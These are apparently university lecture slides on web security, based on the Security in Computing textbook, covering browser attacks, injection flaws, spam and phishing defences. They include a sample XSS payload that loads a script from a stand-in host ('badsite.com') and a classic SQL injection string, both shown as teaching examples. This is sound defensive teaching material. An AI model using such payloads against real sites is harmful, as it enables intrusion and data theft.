1

SECURITY IN
COMPUTING,
FIFTH EDITION
Web-security
 2

Browser Vulnerabilities

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 3

Browser Attack Types

• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 4

Man-in-the-Browser
 5

Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a USB
port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 6

Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 7

Program Download Substitution

• Attacker creates a page with seemingly
innocuous and desirable programs for download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 8

User-in-the-Middle
• Using click-bait to trick
users into solving
CAPTCHAs on
spammers’ behalf

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 9

Successful Authentication
• The attacks listed above are largely failures of
authentication
• Can be mitigated with
• Shared secret
• One-time password
• Out-of-band communication

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 10

Fake Website

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 11

Fake Code

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 12

Tracking Bug

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 13

Clickjacking

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 14

Drive-By Download
• Code is downloaded, installed, and executed on a
computer without the user’s knowledge
• May be the result of clickjacking, fake code, program
download subsitution, etc.

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 15

Cross-Site Scripting (XSS)

• Tricking a client or server into executing scripted code by
including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like
user inputs, so they can take over web pages similarly to
the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 16

SQL Injection
• Injecting SQL code into an exchange between an
application and its database server
• Example:
• Loading an SQL query into a variable, taking the value of acctNum
from an arbitrary user input field:
• QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; "
• The same query with malicious user input:
• QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 17

Dot-Dot-Slash
• Also known as “directory traversal,” this is when attackers
use the term “../” to access files that are on the target web
server but not meant to be accessed from outside
• Most commonly entered into the URL bar but may also be
combined with other attacks, such as XSS

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 18

Server-Side Include (SSI)

• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable to
allowing users to execute SSI directives through text input

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 19

Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures”

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 20

Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites
• Spam countermeasures
• Laws against spam exist but are generally ineffective
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make
spammers’ jobs more difficult

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 Phishing
• Phishing – Cybercriminal attempts to steal personal and financial information or infect
computers and other devices with malware and viruses
• Designed to trick you into clicking a link or providing personal or financial information
• Often in the form of emails and websites
• May appear to come from legitimate companies, organizations or known individuals
• Take advantage of natural disasters, epidemics, health scares, political elections or timely
events

Different forms such as:

• Mass Phishing – Mass, large-volume attack intended to reach as many people as possible
• Whaling – Type of spear phishing attack that targets “big fish,” including high-profile
individuals or those with a great deal of authority or access
• Clone Phishing – Spoofed copy of a legitimate and previously delivered email, with
original attachments or hyperlinks replaced with malicious versions, which is sent from a
forged email address so it appears to come from the original sender or another legitimate
source
• Advance-Fee Scam: Requests the target to send money or bank account information to
the cybercriminal
• And Spear Phishing…..
 Spear Phishing
• Spear phishing is on the rise because it works. Traditional security defences do not detect and stop it.

• From a cyber criminal’s point of view, spear phishing is the perfect vehicle for a broad array of damaging
exploits.

• Threat actors are increasingly targeting executives and other high-level employees, tricking them into
activating malware that gives criminals access into their companies’ environments.

• This might be ransomware that encrypts company data, then extorts fees from the victim to remediate
the situation. Targeted executives are usually key leaders with titles such as chief financial officer, head
of finance, senior vice president and director.

• Spear phishing emails tend to have enough detail to fool even experienced security professionals.

• A phishing campaign may blanket an entire database of email addresses, but spear phishing targets
specific individuals within specific organizations with a specific mission.

• By mining social networks for personal information, an attacker can write emails that are extremely
accurate and compelling.

• Once the target clicks on a link or opens an attachment, the attacker establishes a foothold in the
network, enabling them to complete their illicit mission.

• 84% of organizations said a spear-phishing attack successfully penetrated their organization in 2015
Common Baiting Tactics

• Notification from a help desk or system administrator

Asks you to take action to resolve an issue with your account (e.g., email account has reached its
storage limit), which often includes clicking on a link and providing requested information.

• Advertisement for immediate weight loss, hair growth or fitness prowess

Serves as a ploy to get you to click on a link that will infect your computer or mobile device with
malware or viruses.

• Attachment labeled “invoice” or “shipping order”

Contains malware that can infect your computer or mobile device if opened. May contain what is
known as “ransomware,” a type of malware that will delete all files unless you pay a specified sum of
money.

• Notification from what appears to be a credit card company

Indicates someone has made an unauthorized transaction on your account. If you click the link to log
in to verify the transaction, your username and password are collected by the scammer.

• Fake account on a social media site

Mimics a legitimate person, business or organization. May also appear in the form of an online game,
quiz or survey designed to collect information from your account.
Phishing Lure
• Often makes it
look like a
problem with
one of your
accounts
• Or they try to
takes advantage
of an ongoing
humanitarian
crisis
Can you detect a phishing scam?
Common phishing scam Subject Lines
Barracuda Networks researchers compiled a list of the top 12 most
common subject lines used in phishing emails targeting businesses.
Researchers analyzed over 360,000 phishing emails & found the most
common subject line used in attacks is simply ‘Request’ – accounting for
over a third of all the phishing messages analyzed.

The report found the top 12 subject lines were as followed:

1. Request
2. Follow up
3. Urgent/Important
4. Are you available?/Are you at your desk?
5. Payment Status
6. Hello
7. Purchase
8. Invoice Due
9. Re:
10. Direct Deposit
11. Expenses
12. Payroll
Spear Phishing Characteristics
A spear-phishing attack can display one or more of the following characteristics:

• Blended or multi-vector threat. Spear phishing uses a blend of email spoofing,

dynamic URLs and drive-by downloads to bypass traditional defenses.

• Use of zero-day vulnerabilities. Advanced spear-phishing attacks leverage zero-

day vulnerabilities in browsers, plug-ins and desktop applications to compromise
systems.

• Multi-stage attack. The initial exploit of systems is the first stage of an APT attack
that involves further stages of malware outbound communications, binary
downloads and data exfiltration.

• Well-crafted email forgeries: Spear phishing email threats are usually targeted to
individuals, so they don’t bear much resemblance to the high-volume, broadcast
spam that floods the Internet. This means traditional reputation and spam filters
routinely miss these messages, rendering traditional email protections ineffective.
 How to protect against phishing
• STOP. THINK. CONNECT.
• Before you click, look for common baiting tactics e.g. Requests for personal information, Announcement indicating you won a prize or
lottery or Requests for donations
• Look for spelling errors (e.g., “pessward”), lack of punctuation or poor grammar
• Hyperlinked URL differs from the one displayed, or it is hidden
• Threatening language that calls for immediate action

• Install and maintain antivirus software on your electronic devices

• Use email filters to reduce spam and malicious traffic

• Be wary of messages asking for passwords or other personal information

• All reputable businesses and organizations will never ask for your password via email

• Never send passwords, bank account numbers or other private information in an email
• Do not reply to requests for this information
• Verify by contacting the company or individual, but do not use the contact information included in the message

• Do not click on any hyperlinks in the email

• User your computer mouse to hover over each link to verify its actual destination, even if the message appears to be from a trusted
source
• Pay attention to the URL and look for a variation in spelling or different domain (e.g., ulster.ac vs. ulster.com)
• Consider navigating to familiar sites on your own instead of using links within messages

• Examine websites closely

• Malicious websites may look identical to legitimate sites
• Look for “https://” or a lock icon in the address bar before entering any sensitive information on a website
Best Practice for companies - DMARC
• Organisations should set up DMARC which is Domain-based Message
Authentication, Reporting and Conformance email standard that:
1. confirms the sender’s identity using Sender Policy Framework
(SPF) and DomainKeys Identified Mail (DKIM)
2. tells the recipient’s email service what to do with emails that fail the check
3. asks recipient email services to provide reports of where email comes from

The benefit of DMARC are:

• Protecting your users, employees and reputation from cybercrime
• Reducing customer support costs relating to email fraud
• Improving trust in the emails your organisation sends
• Seeing the legitimate and fraudulent use of your domains via DMARC
Multi layered approach